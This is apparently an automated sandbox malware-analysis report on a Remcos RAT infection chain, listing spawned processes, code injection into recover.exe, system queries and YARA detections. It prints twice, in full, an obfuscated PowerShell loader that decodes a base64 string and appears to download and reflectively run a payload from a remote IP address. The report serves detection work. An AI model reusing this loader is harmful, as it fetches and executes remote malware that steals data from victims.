Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: 61C008	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: 315F008	Jump to behavior

Contains functionality to simulate mouse events

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_004197D9 mouse_event,

8_2_004197D9

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Windows\Temp\anonymiser.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\Sheena.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreak	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HU#cgBl#HQ#aQBl#HM#I##9#C##JwB0#Hg#d##u#G0#aQBo#GU#awBh#HQ#bwB0#HM#c#Bl#HQ#cwB0#HM#ZQBi#HM#aQBo#HI#bwBm#HM#ZwBu#Gk#a#B0#HQ#cwBl#GI#ZwBu#Gk#d#Bh#GU#cgBj#C8#YQBz#Gk#dg#v#H##c#Bt#GE#e##v#DI#Mw#u#DM#Mg#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#C##PQ#g#CQ#cwB1#HI#ZQB0#Gk#ZQBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bt#G8#bwBy#Gw#YQBu#GQ#cw#g#D0#I##n#Gg#d#B0#H##Og#v#C8#Mg#x#Dc#Lg#x#DU#N##u#DU#NQ#u#DE#O##1#C8#e#Bh#G0#c#Bw#C8#Yw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#ZwBv#Gw#Z#Bj#HU#c##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bl#G4#YwBy#Gk#bQBz#G8#bg#g#D0#I##k#Gc#bwBs#GQ#YwB1#H##LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBv#G8#cgBs#GE#bgBk#HM#KQ#7#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GU#bgBj#HI#aQBt#HM#bwBu#Ck#Ow#k#EQ#YQBj#Gk#YQBu#HM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#k#Gc#bwBu#G8#YwBh#Gw#eQBj#GU#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##9#C##J#B1#G4#c#By#G8#dgBv#Gs#ZQBk#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#R#Bh#GM#aQBh#G4#cw#p#Ds#J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#D0#I##k#HU#bgBw#HI#bwB2#G8#awBl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bn#G8#bgBv#GM#YQBs#Hk#YwBl#HM#KQ#7#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#C##LQBn#GU#I##w#C##LQBh#G4#Z##g#CQ#bwBy#HQ#a#Bv#GQ#bwB4#G4#ZQBz#HM#I##t#Gc#d##g#CQ#YQBu#HQ#aQBj#Gg#cgBl#HQ#aQBj#Ds#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#I##r#D0#I##k#EQ#YQBj#Gk#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#I##9#C##J#Bv#HI#d#Bo#G8#Z#Bv#Hg#bgBl#HM#cw#g#C0#I##k#GE#bgB0#Gk#YwBo#HI#ZQB0#Gk#Yw#7#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#C##PQ#g#CQ#dQBu#H##cgBv#HY#bwBr#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bh#G4#d#Bp#GM#a#By#GU#d#Bp#GM#L##g#CQ#c#Bl#HI#cwBv#G4#YQBs#Gk#cwBh#HQ#aQBv#G4#KQ#7#CQ#cgBl#HM#YQB6#HU#cgBp#G4#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBy#GE#dQBj#GE#cgBp#G8#e#B5#Gw#bwBu#Ck#Ow#k#GQ#ZQBj#GU#bgB0#HI#YQB0#GU#Z##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#UgBl#GY#b#Bl#GM#d#Bp#G8#bg#u#EE#cwBz#GU#bQBi#Gw#eQBd#Do#OgBM#G8#YQBk#Cg#J#By#GU#cwBh#Ho#dQBy#Gk#bg#p#Ds#J#B2#GU#cwB0#GU#ZQ#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#aQBi#G8#ZgB1#HI#YQBu#G8#cwBl#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#JwBD#GE#cwBQ#G8#b##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#y#Cc#KQ#p##=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\kpsctizepnmfbmfnkvavzvmxchsqhsjyz"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\vjynt"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\xllfutvz"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "$codigo = 'j#bz#hu#cgbl#hq#aqbl#hm#i##9#c##jwb0#hg#d##u#g0#aqbo#gu#awbh#hq#bwb0#hm#c#bl#hq#cwb0#hm#zqbi#hm#aqbo#hi#bwbm#hm#zwbu#gk#a#b0#hq#cwbl#gi#zwbu#gk#d#bh#gu#cgbj#c8#yqbz#gk#dg#v#h##c#bt#ge#e##v#di#mw#u#dm#mg#x#c4#nq#0#di#lg#y#dc#mq#v#c8#ogbw#hq#d#bo#cc#ow#k#hi#aqbi#g8#zgb1#hi#yqbu#g8#cwbl#c##pq#g#cq#cwb1#hi#zqb0#gk#zqbz#c##lqby#gu#c#bs#ge#ywbl#c##jw#j#cc#l##g#cc#d##n#ds#j#bt#g8#bwby#gw#yqbu#gq#cw#g#d0#i##n#gg#d#b0#h##og#v#c8#mg#x#dc#lg#x#du#n##u#du#nq#u#de#o##1#c8#e#bh#g0#c#bw#c8#yw#v#g4#zqb3#f8#aqbt#ge#zwbl#c4#agbw#gc#jw#7#cq#zwbv#gw#z#bj#hu#c##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#j#bl#g4#ywby#gk#bqbz#g8#bg#g#d0#i##k#gc#bwbs#gq#ywb1#h##lgbe#g8#dwbu#gw#bwbh#gq#r#bh#hq#yq#o#cq#bqbv#g8#cgbs#ge#bgbk#hm#kq#7#cq#dqbu#h##cgbv#hy#bwbr#gu#z##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gu#bgbj#hi#aqbt#hm#bwbu#ck#ow#k#eq#yqbj#gk#yqbu#hm#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#k#gc#bwbu#g8#ywbh#gw#eqbj#gu#cw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#j#bh#g4#d#bp#gm#a#by#gu#d#bp#gm#i##9#c##j#b1#g4#c#by#g8#dgbv#gs#zqbk#c4#sqbu#gq#zqb4#e8#zg#o#cq#r#bh#gm#aqbh#g4#cw#p#ds#j#bv#hi#d#bo#g8#z#bv#hg#bgbl#hm#cw#g#d0#i##k#hu#bgbw#hi#bwb2#g8#awbl#gq#lgbj#g4#z#bl#hg#twbm#cg#j#bn#g8#bgbv#gm#yqbs#hk#ywbl#hm#kq#7#cq#yqbu#hq#aqbj#gg#cgbl#hq#aqbj#c##lqbn#gu#i##w#c##lqbh#g4#z##g#cq#bwby#hq#a#bv#gq#bwb4#g4#zqbz#hm#i##t#gc#d##g#cq#yqbu#hq#aqbj#gg#cgbl#hq#aqbj#ds#j#bh#g4#d#bp#gm#a#by#gu#d#bp#gm#i##r#d0#i##k#eq#yqbj#gk#yqbu#hm#lgbm#gu#bgbn#hq#a##7#cq#c#bl#hi#cwbv#g4#yqbs#gk#cwbh#hq#aqbv#g4#i##9#c##j#bv#hi#d#bo#g8#z#bv#hg#bgbl#hm#cw#g#c0#i##k#ge#bgb0#gk#ywbo#hi#zqb0#gk#yw#7#cq#yqby#ge#dqbj#ge#cgbp#g8#e#b5#gw#bwbu#c##pq#g#cq#dqbu#h##cgbv#hy#bwbr#gu#z##u#fm#dqbi#hm#d#by#gk#bgbn#cg#j#bh#g4#d#bp#gm#a#by#gu#d#bp#gm#l##g#cq#c#bl#hi#cwbv#g4#yqbs#gk#cwbh#hq#aqbv#g4#kq#7#cq#cgbl#hm#yqb6#hu#cgbp#g4#i##9#c##wwbt#hk#cwb0#gu#bq#u#em#bwbu#hy#zqby#hq#xq#6#do#rgby#g8#bqbc#ge#cwbl#dy#n#bt#hq#cgbp#g4#zw#o#cq#yqby#ge#dqbj#ge#cgbp#g8#e#b5#gw#bwbu#ck#ow#k#gq#zqbj#gu#bgb0#hi#yqb0#gu#z##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#ugbl#gy#b#bl#gm#d#bp#g8#bg#u#ee#cwbz#gu#bqbi#gw#eqbd#do#ogbm#g8#yqbk#cg#j#by#gu#cwbh#ho#dqby#gk#bg#p#ds#j#b2#gu#cwb0#gu#zq#g#d0#i#bb#gq#bgbs#gk#yg#u#ek#tw#u#eg#bwbt#gu#xq#u#ec#zqb0#e0#zqb0#gg#bwbk#cg#jwbw#ee#sq#n#ck#lgbj#g4#dgbv#gs#zq#o#cq#bgb1#gw#b##s#c##wwbv#gi#agbl#gm#d#bb#f0#xq#g#e##k##k#hi#aqbi#g8#zgb1#hi#yqbu#g8#cwbl#cw#jw#n#cw#jw#n#cw#jw#n#cw#jwbd#ge#cwbq#g8#b##n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#y#cc#kq#p##=='; $owjuxd = [system.text.encoding]::unicode.getstring([convert]::frombase64string($codigo.replace('#','a'))); invoke-expression $owjuxd"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "$codigo = 'j#bz#hu#cgbl#hq#aqbl#hm#i##9#c##jwb0#hg#d##u#g0#aqbo#gu#awbh#hq#bwb0#hm#c#bl#hq#cwb0#hm#zqbi#hm#aqbo#hi#bwbm#hm#zwbu#gk#a#b0#hq#cwbl#gi#zwbu#gk#d#bh#gu#cgbj#c8#yqbz#gk#dg#v#h##c#bt#ge#e##v#di#mw#u#dm#mg#x#c4#nq#0#di#lg#y#dc#mq#v#c8#ogbw#hq#d#bo#cc#ow#k#hi#aqbi#g8#zgb1#hi#yqbu#g8#cwbl#c##pq#g#cq#cwb1#hi#zqb0#gk#zqbz#c##lqby#gu#c#bs#ge#ywbl#c##jw#j#cc#l##g#cc#d##n#ds#j#bt#g8#bwby#gw#yqbu#gq#cw#g#d0#i##n#gg#d#b0#h##og#v#c8#mg#x#dc#lg#x#du#n##u#du#nq#u#de#o##1#c8#e#bh#g0#c#bw#c8#yw#v#g4#zqb3#f8#aqbt#ge#zwbl#c4#agbw#gc#jw#7#cq#zwbv#gw#z#bj#hu#c##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#j#bl#g4#ywby#gk#bqbz#g8#bg#g#d0#i##k#gc#bwbs#gq#ywb1#h##lgbe#g8#dwbu#gw#bwbh#gq#r#bh#hq#yq#o#cq#bqbv#g8#cgbs#ge#bgbk#hm#kq#7#cq#dqbu#h##cgbv#hy#bwbr#gu#z##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gu#bgbj#hi#aqbt#hm#bwbu#ck#ow#k#eq#yqbj#gk#yqbu#hm#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#k#gc#bwbu#g8#ywbh#gw#eqbj#gu#cw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#j#bh#g4#d#bp#gm#a#by#gu#d#bp#gm#i##9#c##j#b1#g4#c#by#g8#dgbv#gs#zqbk#c4#sqbu#gq#zqb4#e8#zg#o#cq#r#bh#gm#aqbh#g4#cw#p#ds#j#bv#hi#d#bo#g8#z#bv#hg#bgbl#hm#cw#g#d0#i##k#hu#bgbw#hi#bwb2#g8#awbl#gq#lgbj#g4#z#bl#hg#twbm#cg#j#bn#g8#bgbv#gm#yqbs#hk#ywbl#hm#kq#7#cq#yqbu#hq#aqbj#gg#cgbl#hq#aqbj#c##lqbn#gu#i##w#c##lqbh#g4#z##g#cq#bwby#hq#a#bv#gq#bwb4#g4#zqbz#hm#i##t#gc#d##g#cq#yqbu#hq#aqbj#gg#cgbl#hq#aqbj#ds#j#bh#g4#d#bp#gm#a#by#gu#d#bp#gm#i##r#d0#i##k#eq#yqbj#gk#yqbu#hm#lgbm#gu#bgbn#hq#a##7#cq#c#bl#hi#cwbv#g4#yqbs#gk#cwbh#hq#aqbv#g4#i##9#c##j#bv#hi#d#bo#g8#z#bv#hg#bgbl#hm#cw#g#c0#i##k#ge#bgb0#gk#ywbo#hi#zqb0#gk#yw#7#cq#yqby#ge#dqbj#ge#cgbp#g8#e#b5#gw#bwbu#c##pq#g#cq#dqbu#h##cgbv#hy#bwbr#gu#z##u#fm#dqbi#hm#d#by#gk#bgbn#cg#j#bh#g4#d#bp#gm#a#by#gu#d#bp#gm#l##g#cq#c#bl#hi#cwbv#g4#yqbs#gk#cwbh#hq#aqbv#g4#kq#7#cq#cgbl#hm#yqb6#hu#cgbp#g4#i##9#c##wwbt#hk#cwb0#gu#bq#u#em#bwbu#hy#zqby#hq#xq#6#do#rgby#g8#bqbc#ge#cwbl#dy#n#bt#hq#cgbp#g4#zw#o#cq#yqby#ge#dqbj#ge#cgbp#g8#e#b5#gw#bwbu#ck#ow#k#gq#zqbj#gu#bgb0#hi#yqb0#gu#z##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#ugbl#gy#b#bl#gm#d#bp#g8#bg#u#ee#cwbz#gu#bqbi#gw#eqbd#do#ogbm#g8#yqbk#cg#j#by#gu#cwbh#ho#dqby#gk#bg#p#ds#j#b2#gu#cwb0#gu#zq#g#d0#i#bb#gq#bgbs#gk#yg#u#ek#tw#u#eg#bwbt#gu#xq#u#ec#zqb0#e0#zqb0#gg#bwbk#cg#jwbw#ee#sq#n#ck#lgbj#g4#dgbv#gs#zq#o#cq#bgb1#gw#b##s#c##wwbv#gi#agbl#gm#d#bb#f0#xq#g#e##k##k#hi#aqbi#g8#zgb1#hi#yqbu#g8#cwbl#cw#jw#n#cw#jw#n#cw#jw#n#cw#jwbd#ge#cwbq#g8#b##n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#n#cw#jw#y#cc#kq#p##=='; $owjuxd = [system.text.encoding]::unicode.getstring([convert]::frombase64string($codigo.replace('#','a'))); invoke-expression $owjuxd"			Jump to behavior

Source: CasPol.exe, 00000008.00000002.3467761348.0000000001244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerG
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerk-
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager0-
Source: CasPol.exe, 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, jasgbtisot.dat.8.dr	Binary or memory string: [2025/03/26 10:28:15 Program Manager]
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerO-
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001244000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerles\*-
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001226000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: CasPol.exe, 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager\|

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00435034 cpuid

8_2_00435034

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoA,	8_2_0040F26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	8_2_004520E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	8_2_00452097
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	8_2_0045217D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	8_2_0045220A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: EnumSystemLocalesW,	8_2_0044844E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,	8_2_0045245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_00452583
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,	8_2_0045268A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_00452757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: GetLocaleInfoW,	8_2_00448937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	8_2_00451E1F

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00404961 GetLocalTime,CreateEventA,CreateThread,

8_2_00404961

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_0041BB0E GetComputerNameExW,GetUserNameW,

8_2_0041BB0E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_004491DA _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

8_2_004491DA

Source: C:\Windows\SysWOW64\recover.exe

Code function: 9_2_004192F2 GetVersionExW,

9_2_004192F2

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR
